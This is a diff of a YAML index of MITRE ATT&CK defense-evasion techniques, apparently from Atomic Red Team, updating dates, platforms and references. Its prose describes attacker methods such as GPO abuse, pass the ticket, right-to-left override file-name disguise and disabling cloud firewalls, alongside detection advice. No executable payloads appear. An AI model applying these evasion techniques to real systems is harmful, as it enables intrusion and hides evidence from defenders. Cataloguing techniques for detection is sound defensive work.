         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -7060,12 +7195,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -7073,14 +7208,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -7095,6 +7229,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -7103,18 +7238,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -7146,9 +7281,6 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest Account on macOS
@@ -7164,7 +7296,7 @@ defense-evasion:
         elevation_required: true
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -7285,7 +7417,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Dylib Injection via DYLD_INSERT_LIBRARIES
@@ -7400,12 +7531,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -7502,12 +7632,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -7539,11 +7668,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -7584,11 +7712,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -7644,12 +7771,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -7706,7 +7832,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests:
     - name: Make and modify binary from C source
@@ -7815,7 +7940,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -7848,13 +7973,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -7916,10 +8039,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -7977,7 +8099,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -8019,7 +8140,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -8078,41 +8199,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -8121,20 +8211,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -8164,7 +8284,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8199,8 +8319,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -8291,12 +8409,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -8304,19 +8421,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -8325,7 +8448,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -8348,9 +8471,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -8383,7 +8505,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -8402,8 +8524,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -8434,7 +8554,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -8464,12 +8584,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -8495,9 +8613,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -8528,14 +8645,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -8555,6 +8671,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -8562,7 +8679,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -8578,34 +8694,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -8671,7 +8788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -8710,7 +8826,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -8759,8 +8875,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -8811,7 +8925,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -8832,7 +8946,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests:
     - name: Plist Modification
@@ -8918,7 +9031,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -8941,7 +9053,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -8962,8 +9074,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -9024,11 +9134,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -9093,7 +9202,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -9117,7 +9225,7 @@ defense-evasion:
